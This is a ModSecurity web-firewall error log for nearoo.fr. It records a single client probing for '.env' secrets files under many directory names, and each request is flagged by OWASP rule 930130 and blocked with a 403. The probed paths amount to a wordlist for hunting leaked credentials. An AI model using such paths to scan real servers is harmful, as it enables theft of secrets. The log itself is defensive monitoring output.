[Mon May 11 16:54:34.652428 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nuxt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/nuxt/.env"] [unique_id "agHtqkWKUxpmnkK7zHyHNQAAAQI"]
[Mon May 11 16:54:34.652645 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/nuxt/.env"] [unique_id "agHtqkWKUxpmnkK7zHyHNQAAAQI"]
[Mon May 11 16:54:34.652862 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/nuxt/.env"] [unique_id "agHtqkWKUxpmnkK7zHyHNQAAAQI"]
[Mon May 11 16:54:34.796667 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nest/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/nest/.env"] [unique_id "agHtqkWKUxpmnkK7zHyHNgAAAQI"]
[Mon May 11 16:54:34.796866 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/nest/.env"] [unique_id "agHtqkWKUxpmnkK7zHyHNgAAAQI"]
[Mon May 11 16:54:34.797081 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/nest/.env"] [unique_id "agHtqkWKUxpmnkK7zHyHNgAAAQI"]
[Mon May 11 16:54:35.035351 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/react/.env"] [unique_id "agHtq0WKUxpmnkK7zHyHNwAAAQI"]
[Mon May 11 16:54:35.035573 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/react/.env"] [unique_id "agHtq0WKUxpmnkK7zHyHNwAAAQI"]
[Mon May 11 16:54:35.035825 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/react/.env"] [unique_id "agHtq0WKUxpmnkK7zHyHNwAAAQI"]
[Mon May 11 16:54:35.194351 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vue/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/vue/.env"] [unique_id "agHtq0WKUxpmnkK7zHyHOQAAAQI"]
[Mon May 11 16:54:35.194556 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/vue/.env"] [unique_id "agHtq0WKUxpmnkK7zHyHOQAAAQI"]
[Mon May 11 16:54:35.194806 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/vue/.env"] [unique_id "agHtq0WKUxpmnkK7zHyHOQAAAQI"]
[Mon May 11 16:54:35.393260 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /angular/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/angular/.env"] [unique_id "agHtq0WKUxpmnkK7zHyHOgAAAQI"]
[Mon May 11 16:54:35.393486 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/angular/.env"] [unique_id "agHtq0WKUxpmnkK7zHyHOgAAAQI"]
[Mon May 11 16:54:35.393714 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/angular/.env"] [unique_id "agHtq0WKUxpmnkK7zHyHOgAAAQI"]
[Mon May 11 16:54:35.516515 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /svelte/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/svelte/.env"] [unique_id "agHtq0WKUxpmnkK7zHyHOwAAAQI"]
[Mon May 11 16:54:35.516730 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/svelte/.env"] [unique_id "agHtq0WKUxpmnkK7zHyHOwAAAQI"]
[Mon May 11 16:54:35.516959 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/svelte/.env"] [unique_id "agHtq0WKUxpmnkK7zHyHOwAAAQI"]
[Mon May 11 16:54:35.739365 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vite/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/vite/.env"] [unique_id "agHtq0WKUxpmnkK7zHyHPAAAAQI"]
[Mon May 11 16:54:35.739545 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/vite/.env"] [unique_id "agHtq0WKUxpmnkK7zHyHPAAAAQI"]
[Mon May 11 16:54:35.739756 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/vite/.env"] [unique_id "agHtq0WKUxpmnkK7zHyHPAAAAQI"]
[Mon May 11 16:54:35.872409 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backup/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/backup/.env"] [unique_id "agHtq0WKUxpmnkK7zHyHPQAAAQI"]
[Mon May 11 16:54:35.872630 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/backup/.env"] [unique_id "agHtq0WKUxpmnkK7zHyHPQAAAQI"]
[Mon May 11 16:54:35.872852 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/backup/.env"] [unique_id "agHtq0WKUxpmnkK7zHyHPQAAAQI"]
[Mon May 11 16:54:36.045780 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backups/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/backups/.env"] [unique_id "agHtrEWKUxpmnkK7zHyHPgAAAQI"]
[Mon May 11 16:54:36.046013 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/backups/.env"] [unique_id "agHtrEWKUxpmnkK7zHyHPgAAAQI"]
[Mon May 11 16:54:36.046282 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/backups/.env"] [unique_id "agHtrEWKUxpmnkK7zHyHPgAAAQI"]
[Mon May 11 16:54:36.350546 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/old/.env"] [unique_id "agHtrEWKUxpmnkK7zHyHPwAAAQI"]
[Mon May 11 16:54:36.350777 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/old/.env"] [unique_id "agHtrEWKUxpmnkK7zHyHPwAAAQI"]
[Mon May 11 16:54:36.351036 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/old/.env"] [unique_id "agHtrEWKUxpmnkK7zHyHPwAAAQI"]
[Mon May 11 16:54:36.642506 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tmp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/tmp/.env"] [unique_id "agHtrEWKUxpmnkK7zHyHQQAAAQI"]
[Mon May 11 16:54:36.642747 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/tmp/.env"] [unique_id "agHtrEWKUxpmnkK7zHyHQQAAAQI"]
[Mon May 11 16:54:36.642993 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/tmp/.env"] [unique_id "agHtrEWKUxpmnkK7zHyHQQAAAQI"]
[Mon May 11 16:54:36.781856 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /temp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/temp/.env"] [unique_id "agHtrEWKUxpmnkK7zHyHQgAAAQI"]
[Mon May 11 16:54:36.782082 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/temp/.env"] [unique_id "agHtrEWKUxpmnkK7zHyHQgAAAQI"]
[Mon May 11 16:54:36.782350 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/temp/.env"] [unique_id "agHtrEWKUxpmnkK7zHyHQgAAAQI"]
[Mon May 11 16:54:36.997822 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/lab/.env"] [unique_id "agHtrEWKUxpmnkK7zHyHQwAAAQI"]
[Mon May 11 16:54:36.998049 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/lab/.env"] [unique_id "agHtrEWKUxpmnkK7zHyHQwAAAQI"]
[Mon May 11 16:54:36.998280 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/lab/.env"] [unique_id "agHtrEWKUxpmnkK7zHyHQwAAAQI"]
[Mon May 11 16:54:37.161061 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/cronlab/.env"] [unique_id "agHtrUWKUxpmnkK7zHyHRAAAAQI"]
